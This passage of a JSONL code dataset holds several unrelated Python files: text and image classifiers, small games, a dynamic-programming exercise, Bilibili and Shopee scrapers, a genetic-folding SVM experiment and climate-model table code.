''))\n print(\"doc recup (3482) : \", len(list_fichiers))\n \n #Conversion sous format df\n for i, content in enumerate(list_fichiers): \n df.loc[i, 'img_path'] = content\n\n\n return df\n\ndef split_dataset(X,y):\n\n X_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.33, random_state=42)\n\n \n return X_train, X_test, y_train, y_test\n\ndef vectorize(X_train, X_test):\n vectorizer = CountVectorizer(max_features=3000)\n vectorizer.fit(X_train)\n X_train_counts = vectorizer.transform(X_train)\n X_test_counts = vectorizer.transform(X_test)\n \n return X_train_counts, X_test_counts\n\n\n\n \netude_des_classes(path_csv)\n\n\n#Import des fichiers\ndf_fichiers = recup_fichier(path_csv,stopmot=False)\n#print(\"\\nAffichage d'un fichier aléatoire : \\n\\n\", list_fichiers[int(np.random.rand(1) * len(list_fichiers))])\nX_train, X_test, y_train, y_test = split_dataset(X=df_fichiers.img_path,y=df_fichiers.label)\nX_train_counts, X_test_counts = vectorize(X_train, X_test)\n\n# Naives Bayes\n\nprint(\"\\n NAIVES BAYES \\n\")\nclf = MultinomialNB()\nclf.fit(X_train_counts, y_train)\n\nprint(\"vectorize Naive Bayes Score durant la phase de test : \", clf.score(X_test_counts,y_test))\nprint(\"vectorize Naive Bayes Score durant la phase d'entrainement : \", clf.score(X_train_counts,y_train))\n\ny_pred_test = clf.predict(X_test_counts)\nprint(classification_report(y_test, y_pred_test))\nprint(confusion_matrix(y_test, y_pred_test))\n\n#TF-IDF REPRESENTATION\n\nprint(\"\\n TF-IDF REPRESENTATION \\n\")\ntf_transformer = TfidfTransformer().fit(X_train_counts)\nX_train_Tfid = tf_transformer.transform(X_train_counts)\nX_test_Tfid = tf_transformer.transform(X_test_counts)\n\n\nclf = MultinomialNB()\nclf.fit(X_train_Tfid, y_train)\n\nprint(\"TF-IDF Naives Bayes Score durant la phase de test : \", clf.score(X_test_Tfid,y_test))\nprint(\"TF-IDF Naives Bayes Score durant la phase d'entrainement : \", clf.score(X_train_Tfid,y_train))\nprint(X_test_Tfid.shape)\ny_pred_test = clf.predict(X_test_Tfid)\n\nprint(\"Classe non prédit(s) avec TF-IDF Naive Bayes: \", set(y_test)-set(y_pred_test))\nprint(classification_report(y_test, y_pred_test))\n\nprint(confusion_matrix(y_test, y_pred_test))\n\n# Random forest with vectorize frequency representation\n\n#!!!!! La phase de test des Hyperparamètres est sur le Notebook !!!!!\n\nprint(\"\\n Random Forest \\n\")\n\nclf_rf = RandomForestClassifier(n_estimators=800, min_samples_split = 6, max_features = 10)\n\nclf_rf.fit(X_train_counts, y_train)\n\ny_pred_test = clf_rf.predict(X_test_counts)\n\nprint(classification_report(y_test, y_pred_test))\nprint(confusion_matrix(y_test, y_pred_test))\n\n","sub_path":"tobacco_projet.py","file_name":"tobacco_projet.py","file_ext":"py","file_size_in_byte":5069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"451691778","text":"# circleSketcher.py\n# Lab 3\n# Allow a user to draw a circle and then set the fill color of that circle\n# by: Sam Clemente\n# 9/25/2020\n\nfrom graphics import *\nfrom math import *\n\ndef main():\n \n # Circle Sketcher window is created\n # with reset coordinates for ease of programming\n win = GraphWin(\"Circle Sketcher 0.5\", 640,640)\n win.setCoords(0.0, 0.0, 10.0, 10.0)\n\n # Initial message in Circle Sketcher\n message = Text(Point(5.0, 5.0), \"Click to set your circle's center\")\n message.draw(win)\n\n # Stores point for center of circle\n center = win.getMouse()\n centerPoint = Point(center.getX(), center.getY()).draw(win)\n\n # Changing message\n message.setText(\"Click again to define the radius of your circle\")\n\n # Getting radius point\n edge = win.getMouse()\n\n # Using distance formula to find the radius\n radius = sqrt((center.getX() - edge.getX())**2 +\n (center.getY() - edge.getY())**2)\n\n # Drawing circle\n circle1 = Circle(centerPoint, radius).draw(win)\n\n # Changing message\n message.setText(\"Click again to color the circle red\")\n\n # Setting circle color after click\n win.getMouse()\n circle1.setFill(\"red\")\n\n # Exit prompt\n message.setText(\"Click again to close\")\n win.getMouse()\n win.close()\n \nmain()\n\n","sub_path":"circleSketcher.py","file_name":"circleSketcher.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"234837425","text":"from enum import Enum\r\nimport random\r\n\r\nclass CellStatus(Enum):\r\n EXPOSED = 1\r\n UNEXPOSED = 2\r\n SEALED = 3\r\n\r\nclass GameStatus(Enum):\r\n INPROGRESS = 1\r\n WON = 2\r\n LOST = 3\r\n\r\nMAX_BOUNDS = 10\r\n\r\nclass Minesweeper:\r\n\r\n def __init__(self):\r\n self.flag = False\r\n\r\n self.cells = [[CellStatus.UNEXPOSED\r\n for i in range(MAX_BOUNDS)] for j in range(MAX_BOUNDS)]\r\n\r\n self.CellType = [[False\r\n for i in range(MAX_BOUNDS)] for j in range(MAX_BOUNDS)]\r\n\r\n self.minedCell = []\r\n\r\n def expose_cell(self, row, col):\r\n self.check_bounds(row, col)\r\n\r\n if self.cells[row][col] == CellStatus.UNEXPOSED:\r\n self.cells[row][col] = CellStatus.EXPOSED\r\n if self.adjacent_mine_count_at(row, col) == 0:\r\n self.expose_neighbors(row, col)\r\n\r\n def expose_neighbors(self, i, j):\r\n neighbors = [[i, j+1], [i+1, j], [i+1, j+1], [i, j-1], [i+1, j-1], [i-1, j], [i-1, j+1], [i-1, j-1]]\r\n for cell in neighbors:\r\n if 0 <= cell[0] <= MAX_BOUNDS - 1 and 0 <= cell[1] <= MAX_BOUNDS - 1:\r\n self.expose_cell(cell[0],cell[1])\r\n\r\n def toggle_seal(self, row, col):\r\n self.check_bounds(row, col)\r\n\r\n if self.cells[row][col] == CellStatus.EXPOSED:\r\n return\r\n\r\n if self.cells[row][col] == CellStatus.SEALED:\r\n self.cells[row][col] = CellStatus.UNEXPOSED\r\n else:\r\n self.cells[row][col] = CellStatus.SEALED\r\n\r\n def get_cell_state(self, row, col):\r\n return self.cells[row][col]\r\n\r\n def check_bounds(self, row, column):\r\n if row not in range(0, MAX_BOUNDS) or column not in range(0, MAX_BOUNDS):\r\n raise IndexError\r\n\r\n def set_mine(self, row, col):\r\n self.CellType[row][col] = True\r\n self.minedCell.append([row,col])\r\n\r\n def is_mine_at(self, row, col):\r\n if 0 <= row <= 10 - 1 and 0 <= col <= 10 - 1:\r\n return self.CellType[row][col]\r\n else:\r\n return False\r\n\r\n def adjacent_mine_count_at(self, i, j):\r\n neighbors = [[i, j + 1], [i + 1, j], [i + 1, j + 1], [i, j - 1], [i + 1, j - 1], [i - 1, j], [i - 1, j + 1], [i - 1, j - 1]]\r\n counter = 0\r\n for cell in neighbors:\r\n if self.is_mine_at(cell[0], cell[1]) is True:\r\n counter += 1\r\n return counter\r\n\r\n def get_game_status(self):\r\n for i in range(len(self.minedCell)):\r\n if self.get_cell_state(self.minedCell[i][0], self.minedCell[i][1]) == CellStatus.EXPOSED:\r\n return GameStatus.LOST\r\n\r\n for i in range(MAX_BOUNDS):\r\n for j in range(MAX_BOUNDS):\r\n if (i, j) not in self.minedCell and self.get_cell_state(i, j) == CellStatus.UNEXPOSED:\r\n return GameStatus.INPROGRESS\r\n\r\n for i in range(len(self.minedCell)):\r\n if self.get_cell_state(self.minedCell[i][0], self.minedCell[i][1]) != CellStatus.SEALED:\r\n return GameStatus.INPROGRESS\r\n\r\n return GameStatus.WON\r\n\r\n def randomize(self,seed):\r\n random.seed(seed)\r\n k = list()\r\n tempList = list()\r\n\r\n while len(tempList) != 10:\r\n i = random.randint(0, MAX_BOUNDS - 1)\r\n j = random.randint(0, MAX_BOUNDS - 1)\r\n k.append([i, j])\r\n for sublist in k:\r\n if sublist not in tempList:\r\n tempList.append(sublist)\r\n\r\n self.minedCell = tempList\r\n\r\n for i in range(len(self.minedCell)):\r\n self.CellType[self.minedCell[i][0]][self.minedCell[i][1]] = True\r\n","sub_path":"Minesweeper.py","file_name":"Minesweeper.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"548465736","text":"import sys\n\nsys.stdin = open(\"input.txt\",\"r\")\n\nN = int(sys.stdin.readline().rstrip())\n\nstore = [[0 for j in range(10)] for i in range(N+1)]\n\nfor j in range(1,10):\n store[1][j] = 1\n\ndef make(n):\n\n for j in range(10):\n if j ==9:\n cur = store[n - 1][j - 1] % 1000000000\n elif j == 0:\n cur = store[n-1][j+1] % 1000000000\n else:\n cur = store[n - 1][j - 1]%1000000000 + store[n - 1][j + 1]%1000000000\n\n store[n][j] = cur\n\nfor n in range(2,N+1):\n make(n)\nans = 0\nfor i in range(10):\n ans = (ans + store[N][i]) % 1000000000\n\nprint(ans)","sub_path":"쉬운 계단 수.py","file_name":"쉬운 계단 수.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"105946496","text":"#!/usr/bin/python\n# # -*- coding: UTF-8 -*-\nfrom tensorflow.keras.preprocessing import image\nimport numpy as np\nimport cv2\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.applications.mobilenet import MobileNet\nfrom tensorflow.keras.applications.mobilenet import preprocess_input, decode_predictions\n\n\n#include_top=True,完整的模型\n#include_top=False,去掉最后的3个全连接层,用来做fine-tuning专用,专门开源了这类模型。 \nmodel = MobileNet(weights='imagenet')\nprint(model.summary())\n\n\n\nimg_path = \"elephant.jpg\"\nimg = image.load_img(img_path, target_size=(224, 224))\n#将输入数据转换为0~1之间\nimg = image.img_to_array(img) / 255.0\n# 为batch添加第四维,axis=0表示在0位置添加,因为MobileNet的Iput层结构是(None,224,224,3)\nimg = np.expand_dims(img, axis=0)\nprint(img.shape)\n\npredictions = model.predict(img)\nprint('Predicted:', decode_predictions(predictions, top=3)[0])\nprint(predictions)\n\ndescription = decode_predictions(predictions, top=3)[0][0][1]\n\nsrc = cv2.imread(img_path)\ncv2.putText(src, description, (50,50), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,0,0), 2)\ncv2.imshow(\"Predicted\", src)\ncv2.waitKey()\n\n\n","sub_path":"mobilenet预测.py","file_name":"mobilenet预测.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"133106744","text":"# -*- coding: utf-8 -*-\n\nimport scrapy\nfrom scrapy import Request\nfrom spider_execute.items import SpiderFansItem\n\nimport json\nimport time\nimport traceback\n\nclass BilibiliSpider(scrapy.Spider):\n \"\"\"bilibili爬虫\"\"\"\n name = \"fans\"\n # 4千万用户id\n start_urls = range(1, 400000000)\n url = 'https://api.bilibili.com/x/relation/followers?vmid=%s&pn=%s&ps=50&order=desc&jsonp=jsonp'\n # 复写settings\n custom_settings = {\n 'AUTOTHROTTLE_ENABLED': False\n }\n # 复写head\n head = {\n 'Host': 'api.bilibili.com'\n }\n\n def start_requests(self):\n '''初始化请求资源'''\n\n for mid in self.start_urls:\n self.mid = mid\n self.page = 1\n yield Request(\n url=self.url % (self.mid, self.page),\n headers=self.head,\n callback=self.parse\n )\n\n\n def parse(self, response):\n \"\"\"结果集\"\"\"\n try:\n # 获取items\n data = json.loads(response.body_as_unicode())\n for jsData in data['data']['list']:\n item_dict = SpiderFansItem()\n item_dict['source'] = 'fans'\n item_dict['mid'] = self.mid\n item_dict['fmid'] = jsData['mid']\n item_dict['mtime'] = jsData['mtime']\n item_dict['uname'] = jsData['uname']\n item_dict['official_verify_type'] = jsData['official_verify']['type']\n item_dict['official_verify_desc'] = jsData['official_verify']['desc']\n item_dict['sign'] = jsData['sign']\n item_dict['insert_time'] = int(time.time())\n # 递归\n if len(data['data']) == 50 and self.page < 5:\n self.page += 1\n yield Request(\n url=self.url % (self.mid, self.page),\n headers=self.head,\n callback=self.parse\n )\n # 入库\n else:\n yield item_dict\n\n except:\n print (traceback.format_exc())\n\n\n","sub_path":"spider_execute/spider_execute/spiders/fans.py","file_name":"fans.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"335924504","text":"# Preprocessing\nimport os\nimport pickle\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom keras.utils import to_categorical\nfrom utils import *\nfrom models import HCNN, Metrics_HCNN\nimport sys\n\n# Evaluation\nfrom keras import backend as K\nfrom keras.models import load_model, Model\nfrom sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.neighbors import LocalOutlierFactor\nfrom sklearn.svm import OneClassSVM\nimport pymysql.cursors\nfrom tqdm import tqdm\n\ndataset = 'SwDA'\nproportion = int(sys.argv[1])\n\nlogger = create_logger('HCNN_w3')\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3\"\nif proportion==25:\n gpu_id = \"0\"\nelif proportion==50:\n gpu_id = \"2\"\nelif proportion==75:\n gpu_id = \"3\"\nset_allow_growth(gpu_id)\n\n\n# Un-serialize\nwith open('data/df.pickle', 'rb') as handle:\n df = pickle.load(handle)\nwith open('data/word_index.pickle', 'rb') as handle:\n word_index = pickle.load(handle)\n\nwith open('data/X_train_0.pickle', 'rb') as handle:\n X_train = pickle.load(handle)\nwith open('data/X_valid_0.pickle', 'rb') as handle:\n X_valid = pickle.load(handle)\nwith open('data/X_test_0.pickle', 'rb') as handle:\n X_test = pickle.load(handle)\n \nwith open('data/X_train_-1.pickle', 'rb') as handle:\n X_train_n1 = pickle.load(handle)\nwith open('data/X_valid_-1.pickle', 'rb') as handle:\n X_valid_n1 = pickle.load(handle)\nwith open('data/X_test_-1.pickle', 'rb') as handle:\n X_test_n1 = pickle.load(handle)\n\nwith open('data/X_train_1.pickle', 'rb') as handle:\n X_train_p1 = pickle.load(handle)\nwith open('data/X_valid_1.pickle', 'rb') as handle:\n X_valid_p1 = pickle.load(handle)\nwith open('data/X_test_1.pickle', 'rb') as handle:\n X_test_p1 = pickle.load(handle)\n \nwith open('data/X_train_2.pickle', 'rb') as handle:\n X_train_p2 = pickle.load(handle)\nwith open('data/X_valid_2.pickle', 'rb') as handle:\n X_valid_p2 = pickle.load(handle)\nwith open('data/X_test_2.pickle', 'rb') as handle:\n X_test_p2 = pickle.load(handle)\n \nwith open('data/X_train_-2.pickle', 'rb') as handle:\n X_train_n2 = pickle.load(handle)\nwith open('data/X_valid_-2.pickle', 'rb') as handle:\n X_valid_n2 = pickle.load(handle)\nwith open('data/X_test_-2.pickle', 'rb') as handle:\n X_test_n2 = pickle.load(handle)\n\nwith open('data/y_train.pickle', 'rb') as handle:\n y_train = pickle.load(handle)\nwith open('data/y_valid.pickle', 'rb') as handle:\n y_valid = pickle.load(handle)\nwith open('data/y_test.pickle', 'rb') as handle:\n y_test = pickle.load(handle)\n\nspeaker_change_train = np.load('data/speaker_change_train_3.npy')\nspeaker_change_valid = np.load('data/speaker_change_valid_3.npy')\nspeaker_change_test = np.load('data/speaker_change_test_3.npy')\n\nn_class = y_train.unique().shape[0]\nn_class_seen = int(n_class * proportion/100)\n\nfor number in range(10):\n with open('data/y_cols_' + dataset + \"_\" + str(proportion) + '_' + str(number) + '.pickle', 'rb') as handle:\n d = pickle.load(handle)\n\n y_cols_seen = d['y_cols_seen'] \n y_cols_unseen = d['y_cols_unseen']\n print(y_cols_seen)\n\n train_seen_idx = y_train[y_train.isin(y_cols_seen)].index\n valid_seen_idx = y_valid[y_valid.isin(y_cols_seen)].index\n\n X_train_seen = X_train[train_seen_idx]\n X_train_n1_seen = X_train_n1[train_seen_idx]\n X_train_p1_seen = X_train_p1[train_seen_idx]\n X_train_n2_seen = X_train_n2[train_seen_idx]\n X_train_p2_seen = X_train_p2[train_seen_idx]\n y_train_seen = y_train[train_seen_idx]\n\n X_valid_seen = X_valid[valid_seen_idx]\n X_valid_n1_seen = X_valid_n1[valid_seen_idx]\n X_valid_p1_seen = X_valid_p1[valid_seen_idx]\n X_valid_n2_seen = X_valid_n2[valid_seen_idx]\n X_valid_p2_seen = X_valid_p2[valid_seen_idx]\n y_valid_seen = y_valid[valid_seen_idx]\n\n speaker_change_train_seen = speaker_change_train[train_seen_idx]\n speaker_change_valid_seen = speaker_change_valid[valid_seen_idx]\n\n le = LabelEncoder()\n le.fit(y_train_seen)\n y_train_idx = le.transform(y_train_seen)\n y_train_onehot = to_categorical(y_train_idx)\n y_valid_idx = le.transform(y_valid_seen)\n y_valid_onehot = to_categorical(y_valid_idx)\n y_test_mask = y_test.copy()\n y_test_mask[y_test_mask.isin(y_cols_unseen)] = 'unseen'\n\n metrics_earlystop = Metrics_HCNN(logger)\n\n targets_train = np.expand_dims(np.tile([0,0,1,0,0], (X_train_seen.shape[0],1)), axis=2)\n targets_valid = np.expand_dims(np.tile([0,0,1,0,0], (X_valid_seen.shape[0],1)), axis=2)\n targets_test = np.expand_dims(np.tile([0,0,1,0,0], (X_test.shape[0],1)), axis=2)\n\n train_data = ([X_train_seen, X_train_n1_seen, X_train_p1_seen, X_train_n2_seen, X_train_p2_seen, speaker_change_train_seen, targets_train], y_train_onehot)\n valid_data = ([X_valid_seen, X_valid_n1_seen, X_valid_p1_seen, X_valid_n2_seen, X_valid_p2_seen, speaker_change_valid_seen, targets_valid], y_valid_onehot)\n test_data = ([X_test, X_test_n1, X_test_p1, X_test_n2, X_test_p2, speaker_change_test, targets_test], y_test_mask)\n \n # Load model\n model = load_model('data/HCNN-DOC_w3_' + str(proportion) + '_' + str(number) + '.h5')\n y_pred_proba = model.predict(test_data[0])\n y_pred_proba_train = model.predict(train_data[0])\n classes = list(le.classes_) + ['unseen']\n\n d_result = {\n 'all': defaultdict(dict),\n 'seen': defaultdict(dict),\n 'unseen': defaultdict(dict),\n }\n \n \n \n method = \"2DOC\"\n df_seen = pd.DataFrame(y_pred_proba, columns=le.classes_)\n df_seen_train = pd.DataFrame(y_pred_proba_train, columns=le.classes_)\n df_seen_train['y_true'] = y_train_seen.values\n col_to_threshold = {}\n alpha = 2\n for col in y_cols_seen:\n tmp = df_seen_train[df_seen_train['y_true']==col][[col, 'y_true']]\n tmp = np.hstack([tmp[col], 2-tmp[col]])\n threshold = 1 - alpha*tmp.std()\n col_to_threshold[col] = threshold\n col_to_threshold = {k: max([0.5, v])for k, v in col_to_threshold.items()}\n masks = [df_seen[col]= min_len_str:\n result.append(\n {\n 'itemid': itemid,\n 'shopid': shopid,\n 'userid': userid,\n 'cmtid': cmtid,\n 'mtime': mtime,\n 'rating_star': rating_star,\n 'comment': comment\n })\n return result\n\n\ndef get_products_from_json(json_data, get_top_product=False):\n data = json_data['data']\n sections = data['sections'] if data != None else []\n result = []\n for s in sections:\n data = s['data']\n item = data['item']\n if item != None:\n for i in item:\n shopid = i['shopid']\n itemid = i['itemid']\n result.append(\n {\n 'shopid': shopid,\n 'itemid': itemid\n })\n if get_top_product:\n top_product = data['top_product']\n if top_product != None:\n for t in top_product:\n list = t['list']\n data = list['data']\n item_lite = data['item_lite']\n if item_lite != None:\n for i in item_lite:\n shopid = i['shopid']\n itemid = i['itemid']\n result.append(\n {\n 'shopid': shopid,\n 'itemid': itemid\n })\n return result\n\n\ndef get_all_ratings(itemid, shopid, limit=6, offset=0, min_len_cmt=4, type=0):\n result = []\n while True:\n json_data = get_json_product(itemid, limit, offset, shopid, type)\n ratings = get_ratings_from_json(json_data, min_len_cmt)\n if ratings == []:\n break\n else:\n result += ratings\n offset += limit\n return result\n\n\ndef get_all_recommended_products(max_products=100, limit=10, offset=0, get_top_product=False):\n result = []\n if max_products < limit:\n limit = max_products\n while True:\n start_time = time.time()\n # Notes: The number of products may be smaller than limit number although max_products < limit\n # So the number of result can be larger than the max_products\n json_data = get_json_recommend(limit, offset)\n products = get_products_from_json(json_data, get_top_product)\n if products == [] or len(result) >= max_products:\n break\n else:\n result += products\n print('Đã lấy về {} sản phẩm trên tổng số tối đa {} sản phẩm. Mất {:0.2f} mili giây'.format(\n len(result), max_products, (time.time() - start_time)*1000))\n offset += limit\n return result\n\n\ndef get_all_campaign_products(label, max_products=100, limit=10, offset=0):\n result = []\n if max_products < limit:\n limit = max_products\n while True:\n start_time = time.time()\n # Notes: The number of products may be smaller than limit number although max_products < limit\n # So the number of result can be larger than the max_products\n json_data = get_json_campaign(label, limit, offset)\n products = get_products_from_json(json_data, False)\n if products == [] or len(result) >= max_products:\n break\n else:\n result += products\n print('Đã lấy về {} sản phẩm trên tổng số {} sản phẩm, tối đa {} sản phẩm. Mất {:0.2f} mili giây'.format(\n len(products), len(result), max_products, (time.time() - start_time)*1000))\n offset += limit\n return result\n\n\ndef export_to_text_file(array_of_json, filename, only_header=False):\n f = open(filename, 'a+', encoding='utf-8')\n if only_header:\n f.write('userid\\tcmtid\\tmtime\\trating_star\\tcomment\\n')\n else:\n for j in array_of_json:\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(\n j['userid'], j['cmtid'], j['mtime'], j['rating_star'], j['comment']))\n f.close()\n\n\ndef collect_reviews_product(filename, max_products, min_len_cmt=4, types=[0]):\n '''Collect all reviews of products with specific rating_star\n * type = array [0]: get all rating_stars\n * type = array [1..5]: get only these rating_stars\n '''\n products = get_all_recommended_products(\n max_products=max_products, get_top_product=True)\n # products = get_all_campaign_products(1005922, max_products)\n length_products = len(products)\n export_to_text_file(None, filename, True)\n for p in products:\n start_time = time.time()\n itemid = p['itemid']\n shopid = p['shopid']\n ratings = []\n if types != None and types != []:\n for t in types:\n ratings += get_all_ratings(\n itemid, shopid, min_len_cmt=min_len_cmt, type=t)\n else:\n ratings += get_all_ratings(itemid, shopid, min_len_cmt=min_len_cmt)\n export_to_text_file(ratings, filename)\n length_products -= 1\n print('Đã thu thập và ghi {} đánh giá của sản phẩm {} tại shop {}. Còn {} sản phẩm nữa. Mất {:0.2f} mili giây'.format(\n len(ratings), itemid, shopid, length_products, (time.time() - start_time)*1000))\n\n\ndef remove_duplicate_column(filename, col_check):\n df = pd.read_csv(filename, delimiter='\\t')\n print(df['rating_star'].value_counts().sort_index(ascending=True))\n df.drop_duplicates(col_check, inplace=True)\n print(df['rating_star'].value_counts().sort_index(ascending=True))\n df.to_csv(filename, sep='\\t', index=False)\n\n\ndef prune(filename):\n df = pd.read_csv(filename, delimiter='\\t')\n min = df.groupby('rating_star').agg('count')['comment'].min()\n for i in [1, 2, 3, 4, 5]:\n rows = df.loc[df['rating_star'] == i]\n rows = rows.sort_values(\n by='comment', key=lambda x: x.str.len(), ascending=False)\n rows = rows.head(min)\n header = True if i == 1 else False\n rows.to_csv('pruned_' + filename, mode='a',\n index=False, sep='\\t', header=header)\n\n\nif __name__ == '__main__':\n # collect_reviews_product('sentiments.txt', 100, types=[1, 2, 3, 4])\n remove_duplicate_column('sentiments_v5.txt', 'comment')\n","sub_path":"APIv1.py","file_name":"APIv1.py","file_ext":"py","file_size_in_byte":9387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"210301940","text":"'''\r\n This file is part of GFLIB toolbox\r\n First Version Sept. 2018\r\n\r\n Cite this project as:\r\n Mezher M., Abbod M. (2011) Genetic Folding: A New Class of Evolutionary Algorithms.\r\n In: Bramer M., Petridis M., Hopgood A. (eds) Research and Development in Intelligent Systems XXVII.\r\n SGAI 2010. Springer, London\r\n\r\n Copyright (C) 20011-2018 Mohd A. Mezher (mohabedalgani@gmail.com)\r\n'''\r\n\r\nfrom warnings import filterwarnings\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport os\r\nimport glob\r\n\r\n# create folder for graphs generated during the run\r\nif not os.path.exists('images/'):\r\n os.makedirs('images/')\r\nelse:\r\n files = glob.glob('images/*')\r\n for f in files:\r\n os.remove(f)\r\n\r\nfrom inipop import inipop\r\nfrom genpop import genpop\r\nfrom tipicalsvm import typicalsvm\r\n\r\nfilterwarnings('ignore')\r\nprint('Running multi classification ...\\n\\n')\r\n\r\nprint('Type the maximum length of the chromosome: ')\r\nmax_chromosome_length = int(input()) # the maximum total length of the chromosome\r\n\r\nDATA_PATH = 'data/multi/' # Dataset path for binary classification\r\n\r\nparams = dict()\r\nparams['type'] = 'multi' # problem type\r\nparams['data'] = 'wine_scale.txt' # path to data file\r\nparams['kernel'] = 'rbf' # rbf,linear,polynomial,gf\r\nparams['mutProb'] = 0.1 # mutation probability\r\nparams['crossProb'] = 0.5 # crossover probability\r\nparams['maxGen'] = 5 # max generation\r\nparams['popSize'] = 10 # population size\r\nparams['crossVal'] = 5 # number of cross validation slits\r\nparams['opList'] = ['Plus_s', 'Minus_s', 'Plus_v', 'Minus_v',\r\n 'Sine', 'Cosine', 'Tanh', 'Log', 'x', 'y'] # Operators and operands\r\n\r\nprint(f'''Data Set : {DATA_PATH + params['data']}\\n\\n''')\r\nkernels = ['poly', 'rbf', 'linear', 'gf']\r\ntotalMSE = dict()\r\nfor ker in kernels:\r\n totalMSE[ker] = list()\r\n\r\nfor i in range(5):\r\n temp = []\r\n for index, kernel in enumerate(kernels):\r\n params['kernel'] = kernel\r\n print(f'''SVM Kernel : {params['kernel']} \\n''')\r\n if kernel == 'gf':\r\n print(f'''Max Generation : {params['maxGen']}\\n''')\r\n print(f'''Population Size : {params['popSize']}\\n''')\r\n print(f'''CrossOver Probability : {params['crossProb']}\\n''')\r\n print(f'''Mutation Probability : {params['mutProb']}\\n\\n''')\r\n pop = inipop(params, max_chromosome_length)\r\n mse = genpop(pop, params, i)\r\n else:\r\n mse = typicalsvm(params)\r\n totalMSE[kernel].append(mse)\r\n print('\\n')\r\n\r\n# Boxplot of errors for each kernel\r\nplt.boxplot([totalMSE['poly'], totalMSE['rbf'], totalMSE['linear'], totalMSE['gf']])\r\nplt.xticks(np.arange(1,5), kernels)\r\nplt.title('MSE for each svm kernel')\r\nplt.xlabel('SVM kernel')\r\nplt.ylabel('Test Error Rate')\r\nplt.ioff()\r\nplt.savefig('images/mse.png')\r\nplt.show()\r\n\r\n","sub_path":"multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"19717971","text":"'''\r\nModule to handle the generation of explorer tables from information supplied to \r\nthe CMIP5 questionnaire\r\n\r\n@author: gerard devine\r\n'''\r\n\r\nfrom cmip5q.explorer.dbvalues import *\r\nfrom cmip5q.protoq.models import NumericalRequirement\r\n\r\n\r\ndef modeldesctable(models):\r\n ''' Generates all information necessary for AR5 table 1 (i.e. the model \r\n description table)\r\n \r\n '''\r\n \r\n for m in models:\r\n \r\n # 0. get top level info\r\n \r\n #Get the main model reference(s)\r\n m.mainrefs, m.maincits = get_Refs(m, 'model')\r\n \r\n # 1. Get aerosol column information\r\n \r\n #Check that realm is implemented\r\n m.aerimplemented = is_compimpl(m, 'Aerosols')\r\n\r\n if not m.aerimplemented:\r\n m.aerabbrev = m.aerrefs = m.aercits = 'Not Implemented' \r\n else:\r\n #Get the abbrev\r\n m.aerabbrev = get_compabbrev(m, 'Aerosols')\r\n #Get the component references\r\n m.aerrefs, m.aercits = get_Refs(m, 'Aerosols') \r\n\r\n # 2. Get atmosphere column information\r\n \r\n #Check that realm is implemented\r\n m.atmosimplemented = is_compimpl(m, 'Atmosphere')\r\n if m.atmosimplemented:\r\n #Get the abbrev\r\n m.atmosabbrev = get_compabbrev(m, 'Atmosphere')\r\n #Get the component references\r\n m.atmosrefs, m.atmoscits = get_Refs(m, 'Atmosphere')\r\n #Get vertical grid info\r\n m.atmosgridtop, m.atmosnumlevels = get_vertgridinfo(m, 'Atmosphere')\r\n #Get horizontal grid menmonic and resolution\r\n atmosgridres, atmosgridmnem = get_HorGridRes(m, 'Atmosphere', \r\n mnemonic=True)\r\n m.atmoshorgrid = atmosgridmnem+' '+ atmosgridres\r\n \r\n \r\n # 3. Get atmospheric chemistry column information\r\n \r\n #Check that realm is implemented\r\n m.atmchemimplemented = is_compimpl(m, 'AtmosphericChemistry')\r\n if not m.atmchemimplemented:\r\n m.atmchemabbrev = m.atmchemrefs = m.atmchemcits = 'Not Implemented' \r\n else:\r\n #Get the abbrev\r\n m.atmchemabbrev = get_compabbrev(m, 'AtmosphericChemistry')\r\n #Get the component references\r\n m.atmchemrefs, m.atmchemcits = get_Refs(m, 'AtmosphericChemistry')\r\n \r\n \r\n # 4. Get land ice column information\r\n \r\n #Check that realm is implemented\r\n m.liceimplemented = is_compimpl(m, 'LandIce')\r\n if not m.liceimplemented:\r\n m.liceabbrev = m.licerefs = m.licecits = 'Not Implemented' \r\n else:\r\n #Get the abbrev\r\n m.liceabbrev = get_compabbrev(m, 'LandIce')\r\n #Get the component references\r\n m.licerefs, m.licecits = get_Refs(m, 'LandIce')\r\n \r\n \r\n # 5. Get land surface column information\r\n \r\n #Check that realm is implemented\r\n m.lsurfimplemented = is_compimpl(m, 'LandSurface')\r\n if not m.lsurfimplemented:\r\n m.lsurfabbrev = m.lsurfrefs = m.lsurfcits = 'Not Implemented'\r\n else:\r\n #Get the abbrev\r\n m.lsurfabbrev = get_compabbrev(m, 'LandSurface')\r\n #Get the component references\r\n m.lsurfrefs, m.lsurfcits = get_Refs(m, 'LandSurface')\r\n \r\n \r\n # 6. Get Ocean Biogeo column information\r\n \r\n #Check that realm is implemented\r\n m.obgcimplemented = is_compimpl(m, 'OceanBiogeoChemistry')\r\n if not m.obgcimplemented:\r\n m.obgcabbrev = m.obgcrefs = m.obgccits = 'Not Implemented'\r\n else:\r\n #Get the abbrev\r\n m.obgcabbrev = get_compabbrev(m, 'OceanBiogeoChemistry')\r\n #Get the component references\r\n m.obgcrefs, m.obgccits 